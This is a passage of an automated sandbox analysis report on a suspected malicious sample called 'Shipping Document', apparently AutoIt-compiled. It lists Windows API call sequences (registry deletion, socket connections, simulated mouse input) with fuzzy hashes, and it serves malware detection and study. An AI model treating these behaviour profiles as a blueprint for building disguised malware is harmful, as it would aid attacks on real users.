                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert_memset
                              • String ID: 0
                              • API String ID: 3866635326-4108050209
                              • Opcode ID: 5226639ed959ace99133718c2c9e5af8d5aa744a2afc0f8c2317472e1bd94ea4
                              • Instruction ID: cd4f245f1141f5a813ac52be0910837bb36f0a6d5688ca37930d55fcf38ce715
                              • Opcode Fuzzy Hash: 5226639ed959ace99133718c2c9e5af8d5aa744a2afc0f8c2317472e1bd94ea4
                              • Instruction Fuzzy Hash: 15411AB5A00249EFDB20DF58D9C4E9ABBF9FF08314F048169EE959B250D735A950CF90
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0104125C
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01041286
                              • FreeLibrary.KERNEL32(00000000), ref: 0104133D
                                • Part of subcall function 0104122D: RegCloseKey.ADVAPI32(?), ref: 010412A3
                                • Part of subcall function 0104122D: FreeLibrary.KERNEL32(?), ref: 010412F5
                                • Part of subcall function 0104122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01041318
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 010412E0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                              • String ID:
                              • API String ID: 395352322-0
                              • Opcode ID: adf0140bff9599ea61fcfd01762e1ab47c86faa532b1cfa17590747fceb0dc33
                              • Instruction ID: 5f97be1ffdd2702bb17c003ef8a6089432ca8d16d325f72dd464003556558c79
                              • Opcode Fuzzy Hash: adf0140bff9599ea61fcfd01762e1ab47c86faa532b1cfa17590747fceb0dc33
                              • Instruction Fuzzy Hash: 35314FF5901119BFEB159B94D9C5EFEB7BCEF08300F0041A9E591E2140DA756A859BA0
                              APIs
                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0104655B
                              • GetWindowLongW.USER32(011D5DD8,000000F0), ref: 0104658E
                              • GetWindowLongW.USER32(011D5DD8,000000F0), ref: 010465C3
                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010465F5
                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0104661F
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 01046630
                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0104664A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LongWindow$MessageSend
                              • String ID:
                              • API String ID: 2178440468-0
                              • Opcode ID: 86eaa37a7be65ad250b88d3ba86129b2deacd357e84658f742a361a2d3fbdb05
                              • Instruction ID: 66bdcedb550671b26e9638524d95a22a308d304d1fee8bda5a7ece15d425a8ae
                              • Opcode Fuzzy Hash: 86eaa37a7be65ad250b88d3ba86129b2deacd357e84658f742a361a2d3fbdb05
                              • Instruction Fuzzy Hash: 513119B4604111AFDB31DF6CE8C4F593BE1FB4A750F1902A4F5858B2AADB77A840CB81
                              APIs
                                • Part of subcall function 010380A0: inet_addr.WSOCK32(00000000), ref: 010380CB
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 010364D9
                              • WSAGetLastError.WSOCK32(00000000), ref: 010364E8
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01036521
                              • connect.WSOCK32(00000000,?,00000010), ref: 0103652A
                              • WSAGetLastError.WSOCK32 ref: 01036534
                              • closesocket.WSOCK32(00000000), ref: 0103655D
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01036576
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 910771015-0
                              • Opcode ID: 89263313823b6982da013a44ff32f4e7c15b63746d8506130e786acb4a0df3d1
                              • Instruction ID: 4f4e49af2035a04d6312d255add8cd40887a5a66971ebfc6abf711ce6893f56d
                              • Opcode Fuzzy Hash: 89263313823b6982da013a44ff32f4e7c15b63746d8506130e786acb4a0df3d1
                              • Instruction Fuzzy Hash: 8631B575600119AFEB109F18DD85FBE7BEDEB84714F00806DF989DB281DB79A904CB61
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101E0FA
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101E120
                              • SysAllocString.OLEAUT32(00000000), ref: 0101E123
                              • SysAllocString.OLEAUT32 ref: 0101E144
                              • SysFreeString.OLEAUT32 ref: 0101E14D
                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0101E167
                              • SysAllocString.OLEAUT32(?), ref: 0101E175
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                              • String ID:
                              • API String ID: 3761583154-0
                              • Opcode ID: 56799e944bfb1ec9df35a9f392adf9ad33a5d91c02de1d9cee12da8721714a2d
                              • Instruction ID: fb6076b036189ca195d136db9a7d7defa998d0c204093788aafc8ca76b0063c5
                              • Opcode Fuzzy Hash: 56799e944bfb1ec9df35a9f392adf9ad33a5d91c02de1d9cee12da8721714a2d
                              • Instruction Fuzzy Hash: 2821A776600109AFDB21AFACDC88CAF77ECEB09760B408165FD95CB259DE79DC418B60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 1610af26b24b9e834ce9a36242748c9f068749600a3c281c7c36af31e9ddf50c
                              • Instruction ID: 9fb8fbc3b2552855590963b2e8c0c5866bb77d8de4ed3b3bcc883f1ce33781da
                              • Opcode Fuzzy Hash: 1610af26b24b9e834ce9a36242748c9f068749600a3c281c7c36af31e9ddf50c
                              • Instruction Fuzzy Hash: 8A217CB2104253A6D331B6399E52FAB73D8FF05344F04402AFEC687146E79CA985E3A1
                              APIs
                                • Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
                                • Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
                                • Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 010478A1
                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 010478AE
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 010478B9
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 010478C8
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 010478D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$CreateObjectStockWindow
                              • String ID: Msctls_Progress32
                              • API String ID: 1025951953-3636473452
                              • Opcode ID: 3febb89ce44718102afcc7f349c2f1d706e20caa7b30c34cf2796e22b51dd708
                              • Instruction ID: f175a384b5db5b5a624edd211b36d34e8d41525399b9a8d7dbcde957629200d8
                              • Opcode Fuzzy Hash: 3febb89ce44718102afcc7f349c2f1d706e20caa7b30c34cf2796e22b51dd708
                              • Instruction Fuzzy Hash: A01193B155011ABFFF159E64CC85EEB7F6DEF08798F014129B644A6050C7729C21DBA4
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FE4292,?), ref: 00FE41E3
                              • GetProcAddress.KERNEL32(00000000), ref: 00FE41EA
                              • EncodePointer.KERNEL32(00000000), ref: 00FE41F6
                              • DecodePointer.KERNEL32(00000001,00FE4292,?), ref: 00FE4213
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoInitialize$combase.dll
                              • API String ID: 3489934621-340411864
                              • Opcode ID: abce1ab908f0a5e2ba47f179ed56df646c18968441434528892b9ed581cf3972
                              • Instruction ID: 183ea7576ebee70fb2909a08b472208188f64f68cac8384bc3254cb06fcf2e4e
                              • Opcode Fuzzy Hash: abce1ab908f0a5e2ba47f179ed56df646c18968441434528892b9ed581cf3972
                              • Instruction Fuzzy Hash: 97E012F4E90342AFEF306B75ED49B093595BB11743F508428B9D1D9088D7BF50519F10
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FE41B8), ref: 00FE42B8
                              • GetProcAddress.KERNEL32(00000000), ref: 00FE42BF
                              • EncodePointer.KERNEL32(00000000), ref: 00FE42CA
                              • DecodePointer.KERNEL32(00FE41B8), ref: 00FE42E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoUninitialize$combase.dll
                              • API String ID: 3489934621-2819208100
                              • Opcode ID: 60724c58d8a832416ea83fa475050ffcce40a03856c3a9c353ec3736597bff20
                              • Instruction ID: c7b05fe3c179ec0f2399b36e4b7fa40f45689c4c077f696141dd7c674fbdb496
                              • Opcode Fuzzy Hash: 60724c58d8a832416ea83fa475050ffcce40a03856c3a9c353ec3736597bff20
                              • Instruction Fuzzy Hash: 09E0BFBCA45302EBEF70AF65EE4DB093AA4BB14B46F104018F9C1D5048DB7E5500DB14
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove$__itow__swprintf
                              • String ID:
                              • API String ID: 3253778849-0
                              • Opcode ID: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                              • Instruction ID: 0984039e8a2f08311dc191abf85b8631f5d16122ba368d798a310a060e7b8aeb
                              • Opcode Fuzzy Hash: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                              • Instruction Fuzzy Hash: A661FF305042AAABDF11EF21CD82FFE3BA8AF44308F044158FD895B292DF79A901DB50
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040548
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01040588
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010405AB
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010405D4
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01040617
                              • RegCloseKey.ADVAPI32(00000000), ref: 01040624
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                              • String ID:
                              • API String ID: 4046560759-0
                              • Opcode ID: 5b6cc1124c530c9d8a6daf2fe077c353e89abab99125e88db65497558a246a07
                              • Instruction ID: c2338fec294e8d267dd3943b2b4b0db43831e35dff6f81c24a23af2b0e5b8e93
                              • Opcode Fuzzy Hash: 5b6cc1124c530c9d8a6daf2fe077c353e89abab99125e88db65497558a246a07
                              • Instruction Fuzzy Hash: DF516971108241AFD710EB28CD85EAFBBE8FF88704F04496DF68597291DB76E904DB92
                              APIs
                              • GetMenu.USER32(?), ref: 01045A82
                              • GetMenuItemCount.USER32(00000000), ref: 01045AB9
                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01045AE1
                              • GetMenuItemID.USER32(?,?), ref: 01045B50
                              • GetSubMenu.USER32(?,?), ref: 01045B5E
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 01045BAF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostString
                              • String ID:
                              • API String ID: 650687236-0
                              • Opcode ID: 91c2916b59946df85f3e5857a80521da8efb4aac2ba8e62f3d61b4ab1cf3586c
                              • Instruction ID: 3b80809884a93bd0529bee6e41e07987703482f4c5b916c7d8faabc9926d2056
                              • Opcode Fuzzy Hash: 91c2916b59946df85f3e5857a80521da8efb4aac2ba8e62f3d61b4ab1cf3586c
                              • Instruction Fuzzy Hash: BD5191B5A00216EFDB11DF68CD85AAEB7B4EF48310F1044A9E985BB351CB75AE40CF90
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0101F3F7
                              • VariantClear.OLEAUT32(00000013), ref: 0101F469
                              • VariantClear.OLEAUT32(00000000), ref: 0101F4C4
                              • _memmove.LIBCMT ref: 0101F4EE
                              • VariantClear.OLEAUT32(?), ref: 0101F53B
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0101F569
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$Clear$ChangeInitType_memmove
                              • String ID:
                              • API String ID: 1101466143-0
                              • Opcode ID: 4c9f06770592c76e9b534734b8fb2d75d4b5a36fe7d3f008b5b2d62032abe36b
                              • Instruction ID: ff4af890363c013e85e3d0ae7334ab92d38f78db92d30cbd59a113ac1fc77295
                              • Opcode Fuzzy Hash: 4c9f06770592c76e9b534734b8fb2d75d4b5a36fe7d3f008b5b2d62032abe36b
                              • Instruction Fuzzy Hash: 06516BB5A0020AEFDB10CF58D880AAABBF8FF4C354B158159EA59DB305D734E915CBA0
                              APIs
                              • _memset.LIBCMT ref: 01022747
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022792
                              • IsMenu.USER32(00000000), ref: 010227B2
                              • CreatePopupMenu.USER32 ref: 010227E6
                              • GetMenuItemCount.USER32(000000FF), ref: 01022844
                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01022875
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                              • String ID:
                              • API String ID: 3311875123-0
                              • Opcode ID: 65ccbe77380544e641ce0319b0b9264957128e5676cbccc4dd355ba75f2fbe52
                              • Instruction ID: 64d06b8263bd2029d2f2dba0205cc56ebefabfb071a047e4de6743d0bd4a3b06
                              • Opcode Fuzzy Hash: 65ccbe77380544e641ce0319b0b9264957128e5676cbccc4dd355ba75f2fbe52
                              • Instruction Fuzzy Hash: A951B170A0136ADFDF25CFA8C988AAEBBF4BF44314F104299F9919B291D7B0D544CB51
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FC179A
                              • GetWindowRect.USER32(?,?), ref: 00FC17FE
                              • ScreenToClient.USER32(?,?), ref: 00FC181B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FC182C
                              • EndPaint.USER32(?,?), ref: 00FC1876
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                              • String ID:
                              • API String ID: 1827037458-0
                              • Opcode ID: e30e193eef2508825a69883a706d730958dd6baf06c25d5fb8c6018fe492ba1d
                              • Instruction ID: b287fe06997c3b0da90ece751c302ce143501b5d8a1a6dac318d2a83a03789bb
                              • Opcode Fuzzy Hash: e30e193eef2508825a69883a706d730958dd6baf06c25d5fb8c6018fe492ba1d
                              • Instruction Fuzzy Hash: 9B41A0B1508302DFD720DF24C985FBA7BE8FB4A724F14066CF9D4861A2C73A9855EB61
                              APIs
                              • ShowWindow.USER32(010867B0,00000000,011D5DD8,?,?,010867B0,?,0104B862,?,?), ref: 0104B9CC
                              • EnableWindow.USER32(00000000,00000000), ref: 0104B9F0
                              • ShowWindow.USER32(010867B0,00000000,011D5DD8,?,?,010867B0,?,0104B862,?,?), ref: 0104BA50
                              • ShowWindow.USER32(00000000,00000004,?,0104B862,?,?), ref: 0104BA62
                              • EnableWindow.USER32(00000000,00000001), ref: 0104BA86
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0104BAA9
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 75627b7d0907d1216d6fabab5f1f81a161a56d45a3dfc1076e9eda7b247acce4
                              • Instruction ID: 4b5eef2e60a8930355a746663b88afe123f8779bbe97e304b625ea0d6e4a6e02
                              • Opcode Fuzzy Hash: 75627b7d0907d1216d6fabab5f1f81a161a56d45a3dfc1076e9eda7b247acce4
                              • Instruction Fuzzy Hash: 694153B4600241AFDB62DF2CC5C9BA57FE0BB09315F1841F9EA888F2A6C731E855CB51
                              APIs
                              • GetForegroundWindow.USER32(?,?,?,?,?,?,01035134,?,?,00000000,00000001), ref: 010373BF
                                • Part of subcall function 01033C94: GetWindowRect.USER32(?,?), ref: 01033CA7
                              • GetDesktopWindow.USER32 ref: 010373E9
                              • GetWindowRect.USER32(00000000), ref: 010373F0
                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01037422
                                • Part of subcall function 010254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E
                              • GetCursorPos.USER32(?), ref: 0103744E
                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010374AC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
